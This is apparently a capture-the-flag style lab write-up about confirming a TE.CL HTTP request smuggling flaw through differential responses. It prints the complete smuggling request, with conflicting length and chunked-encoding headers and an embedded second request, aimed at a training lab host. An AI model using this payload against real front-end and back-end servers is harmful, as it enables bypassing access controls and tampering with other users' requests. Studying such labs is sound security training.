HTTP request smuggling, confirming a TE.CL vulnerability via differential responses

Description

This lab involves a front-end and back-end server, and the front-end server doesn’t support chunked encoding. There’s an admin panel at /admin, but the front-end server blocks access to it.

Reproduction and proof of concept

1. Using Burp Repeater, issue the following request twice:

POST / HTTP/1.1
Host: lab-id.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
Content-length: 4
Transfer-Encoding: chunked

5e
POST /404 HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 15

x=1
0

The second request should receive an HTTP 404 response.

Exploitability

An attacker will need to smuggle a request to the back-end server, so that a subsequent request for / (the web root) triggers a 404 Not Found response. In this case the TE.CL vulnerability must be exploited via differential response.